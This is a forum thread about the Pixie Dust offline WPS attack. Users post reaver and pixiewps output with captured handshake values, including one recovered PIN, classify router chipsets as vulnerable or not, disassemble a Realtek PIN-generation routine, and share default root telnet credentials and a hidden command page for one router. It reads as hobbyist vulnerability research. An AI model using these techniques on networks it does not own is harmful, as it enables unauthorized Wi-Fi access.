[P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2
[P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
[+] Sending M2 message
[P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
[P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s

[wn722]

Zyxel Keenetic vulnerable
unknown chpset

Code:

[P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
[P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b
[P] WPS Manufacturer: ZyXEL Communications Corp.
[P] WPS Model Number: KEENETIC series
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44
[P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
[+] Sending M2 message
[+] Received M1 message
[P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
[P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
[Pixie-Dust]  
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
[Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
[Pixie-Dust]   [+] WPS pin: 19048185

[someone_else]

Sorry for off-topic, i've got further information about Compal:

MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In mine 8 cases, "N" is 53059.(Convert this Number (with leading zero)in HEX and you get 353B,Part of the MAC-Address.
The other 9 Numbers "x" are the last 6 Letters from the MAC-Address in Decimal.
And cbn should be something like „Compal Broadband Network“.

Later last Day i've got two Compal-Models with MAC-Address (DC:53:7C), each of them have a different Pin :

Code:

[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c
[P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
[P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
[P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4

AND HERE:

Code:

[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf
[P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
[P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
[P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1

/\/\

NOT VULNERABLE:

Linksys WRT120n
Atheros AR9285

Code:

[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
[P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84
[P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15
[P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
[P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
[P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5

NOT VULNERABLE:

D-Link 615 B2
Atheros AR5416/Atheros AR2122

Code:

[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
[P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f
[P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82
[P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
[P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
[P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f

[nuroo]

1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.

2. Are hashes from locked routers, corrupt - no good 4 analysis?

3. Also any update on Realtek attack?

[kcdtv]

1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable
Help would be appreciated

[someone_else]

3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable [IMG]
Help would be appreciated

Hi,
Got the Firmware, unpacked with fmk, checked with idapro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but i'm not as good in mips, the (in my opinion) important parts are marked, maybe someone, who's familiarized with mips can tell something about.

Code:

LOAD:0040C4C4                 la      $t9, gettimeofday
LOAD:0040C4C8                 move    $a1, $zero
LOAD:0040C4CC                 jalr    $t9 ; gettimeofday
LOAD:0040C4D0                 addiu   $a0, $sp, 0xF0+var_68
LOAD:0040C4D4                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8                 lw      $a0, 0xF0+var_68($sp)
LOAD:0040C4DC                 la      $t9, srand
LOAD:0040C4E0                 nop
LOAD:0040C4E4                 jalr    $t9 ; srand
LOAD:0040C4E8                 nop
LOAD:0040C4EC                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0                 nop
LOAD:0040C4F4                 la      $t9, rand
LOAD:0040C4F8                 nop
LOAD:0040C4FC                 jalr    $t9 ; rand
LOAD:0040C500                 nop
LOAD:0040C504                 li      $v1, 0x6B5FCA6B
LOAD:0040C50C                 mult    $v0, $v1
LOAD:0040C510                 sra     $a0, $v0, 31
LOAD:0040C514                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C518                 nop
LOAD:0040C51C                 la      $t9, 0x400000
LOAD:0040C520                 nop
LOAD:0040C524                 addiu   $t9, (sub_404128 - 0x400000)
LOAD:0040C528                 mfhi    $v1
LOAD:0040C52C                 sra     $v1, 22
LOAD:0040C530                 subu    $a1, $v1, $a0
LOAD:0040C534                 sll     $a0, $a1, 5
LOAD:0040C538                 subu    $a0, $a1
LOAD:0040C53C                 sll     $v1, $a0, 6
LOAD:0040C540                 subu    $v1, $a0
LOAD:0040C544                 sll     $v1, 3
LOAD:0040C548                 addu    $v1, $a1
LOAD:0040C54C                 sll     $a0, $v1, 2
LOAD:0040C550                 addu    $v1, $a0
LOAD:0040C554                 sll     $v1, 7
LOAD:0040C558                 subu    $a1, $v0, $v1
LOAD:0040C55C                 sll     $s0, $a1, 2
LOAD:0040C560                 move    $a0, $a1
LOAD:0040C564                 jalr    $t9 ; sub_404128
LOAD:0040C568                 addu    $s0, $a1
LOAD:0040C56C                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C570                 sll     $s0, 1
LOAD:0040C574                 addu    $a0, $s0, $v0
LOAD:0040C578                 la      $t9, 0x400000
LOAD:0040C57C                 nop
LOAD:0040C580                 addiu   $t9, (sub_403F60 - 0x400000)
LOAD:0040C584                 jalr    $t9 ; sub_403F60
LOAD:0040C588                 addiu   $a1, $sp, 0xF0+var_D0
LOAD:0040C58C                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C590                 addiu   $a1, $sp, 0xF0+var_D0
LOAD:0040C594                 la      $a0, 0x440000
LOAD:0040C598                 la      $t9, printf
LOAD:0040C59C                 nop
LOAD:0040C5A0                 jalr    $t9 ; printf
LOAD:0040C5A4                 addiu   $a0, (aPinS - 0x440000)  # "PIN: %s\n"
LOAD:0040C5A8                 lw      $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC                 li      $a0, 0xADAC
LOAD:0040C5B0                 addu    $a0, $s2, $a0
LOAD:0040C5B4                 la      $t9, strcpy
LOAD:0040C5B8                 b       loc_40C8C0
LOAD:0040C5BC                 addiu   $a1, $sp, 0xF0+var_D0

[reversetheg@p]

1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable
Help would be appreciated

Hello kcdtv,

I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp

Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device

With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:

// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"

// generate a "random" WPS pin
# flash -gen-pin

// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444

// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014

// change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111

About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.

Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.

Congrats everyone for your efforts

[nuroo]

The best way is simply to save a *.cap file with the PROBES and M messages

Gonna take a look at wireshark, try and figure it out.
kcdtv, appreciate the responses -very interesting.

Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.

[someone_else]

i use a modified reaver-src. if i set the -o $logfile switch, reaver writes only the pixie-data in the logfile:

For AuthKey make the following changes:

change :

Code:

wps_common.c:    printf("[P] AuthKey: ");

to :

Code:

wps_common.c:    cprintf(VERBOSE, "[P] AuthKey: ");

and add a new line in wps_common.c (under #include "wps_dev_attr.h) with:

Code:

#include "../misc.h"

And for Messages, you don't need (Here the M1 received Msg):
replace:

Code:

exchange.c:                cprintf(VERBOSE, "[+] Received M1 message\n");

with:

Code:

exchange.c:                printf("[+] Received M1 message\n");

i'll search with grep for all reaver messages, and change everything, which is not important for the output-file.
Not the perfect way, but it works

[datahead]

I do have a fork of autopixiewps i modified a while back that does hash collections, and then produces also a shell script. Ill update my fork in my github repo ( github user name: d8tahead ).

It saves generic reaver output of model info, collects hashes, and produces shell script for coresponding hashes with pixiewps And gives each segment an ID#.

edit:
The one in my repo is a little old, ill update it soon

will post asap

Edit #2:

i had strip out some things from the code, but it should still work fine

autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps

and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x

for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).

also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.

remember to make autopixiewps.py executable!

[aboulatif]

after last ur update reavet doesnt work pixiewps: invalid option -- 'm'

[Laserman75]

after last ur update reavet doesnt work pixiewps: invalid option -- 'm'

i have same problem.
whats wrong?

[Saydamination]

İSSUE : ??

I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

Example :

Wps Manufacturer : TPLINK
WPs model nambur :1

Tplink uses Realtek and Atheros chipset...

True value :

Wps manufacturer : Atheros
wps model number : WR740..

Other example:

WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...

Not "EV-2006-07-27" model number , true value :RTL8671

[soxrok2212]

İSSUE : ??

I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

Example :

Wps Manufacturer : TPLINK
WPs model nambur :1

Tplink uses Realtek and Atheros chipset...

True value :

Wps manufacturer : Atheros
wps model number : WR740..

Other example:

WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...

Not "EV-2006-07-27" model number , true value :RTL8671

It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

[Saydamination]

It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

Hi,soxrok... I see APPs on wireshark.. And there is problem... Pixie sees wrong values..Look screenshots..

Code:

Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
[P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
[P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
[+] Sending M2 message
[P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
[P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]

http://imgur.com/XslVDB6

Code:

Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
